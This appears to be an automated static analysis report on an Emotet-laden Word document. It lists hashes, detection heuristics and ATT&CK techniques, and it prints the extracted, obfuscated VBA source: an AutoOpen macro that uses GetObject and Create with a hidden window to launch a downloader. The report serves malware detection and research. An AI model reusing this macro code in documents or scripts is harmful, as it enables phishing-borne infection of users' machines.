Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 2d4bafc0b214d166…

MALICIOUS

Office (OLE)

Size: 147.8 KB
Created: 2019-03-19 11:12:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 3cbacc07202f0df9ac81ef868a87c55b
SHA-1: 671a272a34d2c98dfc7d149c59a16876c72f0bab
SHA-256: 2d4bafc0b214d166ae41ca6af6487fbe824b2925c2ea34f6f4ba1279ffe84288
Risk score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically an AutoOpen macro, which is a common characteristic of Emotet. The GetObject call within the macro suggests it is designed to download and execute a second-stage payload. ClamAV also explicitly identifies the file as 'Doc.Downloader.Emotet-6901574-0'. The presence of VBA macros together with the downloader functionality strongly indicates malicious intent.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6901574-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6901574-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12409 bytes
SHA-256: 7edd29c748930ae797f6e92900c644df6fdfaf710632fc36ccf1b7812eef0eef

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "XAocXD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "PxAAAXA"
Attribute VB_Base = "0{FB6352A4-015F-40AE-940E-DFEF496155BC}{6A887CBC-6F52-456C-997C-2C3C6AC55011}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "YAAUABDQ"
Sub autoopen()
On Error Resume Next
   If FkAw4A = wUAAkQ Then
bxDAkAA = 68899272 - ChrB(679426435 * Round(479567069) + UAADQA - ChrB(X1AXADwG)) / IAUAA1wC / Rnd(50097093 / iBkAxU * SpBb / ChrW(696308113 * CBool(353109990) / 279340230 + CStr(ZAAwUAA))) / 752931751 * Oct(bUAAQD)
End If
   If dABAU4 = uG1BAAGk Then
WQkAxA = 429675079 - ChrB(212524986 * Round(113521636) + GAcUkAA1 - ChrB(hQw4w4)) / wAkCZAwk / Rnd(841954471 / tA_XxQA * SpBb / ChrW(307636191 * CBool(136730650) / 178939889 + CStr(sCUAQokA))) / 813357237 * Oct(JAAXAAZ)
End If
Set nAB4XAAA = GetObject(PxAAAXA.QxkQDxx)
   If YD4UABU = hQxAAQ Then
XAcADQk = 712862436 - ChrB(762443535 * Round(547345860) + sXADAAG - ChrB(dAAXUA)) / RQBAAAX / Rnd(475122927 / c_GkxAA * SpBb / ChrW(426561580 * CBool(461981977) / 713411298 + CStr(ukABoZAo))) / 682619671 * Oct(LAQZ44)
End If
   If WBBBAD = WAU1AAo Then
VcDAoAA = 1819243 - ChrB(401278137 * Round(772785802) + SAoQUkQ - ChrB(CCo4AAZD)) / NAwDAkAB / Rnd(106339981 / s1koDQQQ * SpBb / ChrW(339776298 * CBool(117710025) / 90242049 + CStr(SAwA_xAA))) / 259947921 * Oct(okGBAA)
End If
   If U4AAoBU_ = IAkAAQAA Then
uGQcAABU = 356988806 - ChrB(810293185 * Round(769993287) + JAAQGA - ChrB(QUwBQoDA)) / jQBxUD / Rnd(820790237 / BxkAA1U * SpBb / ChrW(927173390 * CBool(360088276) / 710026633 + CStr(IAwBAA))) / 437471075 * Oct(XAcAAA_)
End If
nAB4XAAA.ShowWindow = 392260 - 392260
   If tkA1kUQ = iXUkoQ Then
wUAAxQA_ = 741411855 - ChrB(123398079 * Round(257938211) + V1ZGAZ - ChrB(oUkoxUAw)) / SQAAQA / Rnd(323943788 / aBUA1kD * SpBb / ChrW(250440536 * CBool(885181564) / 224731277 + CStr(AUCAAAUx))) / 65360689 * Oct(AAo1AA)
End If
   If vAAokUx = z1_U_XX Then
uwxB1AG = 233935790 - ChrB(311928206 * Round(661343867) + jDABAGQc - ChrB(nAQGQAZ)) / kAQGxQD / Rnd(133119980 / tDAB4A * SpBb / ChrW(228362861 * CBool(709869076) / 145819830 + CStr(WZA1_UQ))) / 612309788 * Oct(mZk4AoU)
End If
   If ZQkDBA1B = qA_cABDA Then
KUkUQG = 325743514 - ChrB(106151707 * Round(130857067) + aAZcAUA - ChrB(tQ14AA)) / CAA_AkQQ / Rnd(653977329 / uAXUAA1 * SpBb / ChrW(241098975 * CBool(982147915) / 9798891 + CStr(qAAAGAQ))) / 666506995 * Oct(hABDCA)
End If
GetObject(PxAAAXA.hAQcUQU).Create% bUAAQA + PxAAAXA.QwAQAD + VQ_Dcc + PxAAAXA.jBxGBA1U + HDBBBQA + PxAAAXA.VAxcA_ + dwCAUB, bxAUAQ, nAB4XAAA, jXZAUZAD
   If V4AQGAQ = IwAUo4DA Then
MXQUQA = 147221648 - ChrB(31558251 * Round(2172008) + u_DXUA - ChrB(QGAXCG)) / noxAUXB / Rnd(222697576 / tQAQwQA * SpBb / ChrW(853272758 * CBool(259400057) / 768003727 + CStr(ZAQ4G4))) / 175996582 * Oct(CBXUAcAA)
End If
   If cxAQAA = JUAAQAA Then
RAQGDBAw = 434653231 - ChrB(997487585 * Round(829813833) + uXAAAc - ChrB(zAUAcxU)) / WAGX4DA / Rnd(485921830 / b1AAQoD * SpBb / ChrW(806640963 * CBool(442477230) / 1712495 + CStr(SA1DZU))) / 34559375 * Oct(aAABUBA)
End If
   If wQAC4AxA = zBAAG1A4 Then
FDXcZAD = 194395026 - ChrB(758302110 * Round(375543275) + E4AAUQ1B - ChrB(sAAA4DA_)) / RUBBDD_ / Rnd(292466042 / cZZwAABA * SpBb / ChrW(906696086 * CBool(255095975) / 332088701 + CStr(NAUABAAB))) / 283714093 * Oct(XGAcAAAc)
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/c5d8a154be09424ca4b65b9a1f85a6dc.bin
' ===============================================================================
' Module streams:
' Macros/VBA/XAocXD - 1104 bytes
' Macros/VBA/PxAAAXA - 1158 bytes
' Macros/VBA/YAAUABDQ - 5434 bytes
' Line #0:
' 	FuncDefn (Sub YAAUABDQ())
' Line #1:

... (truncated)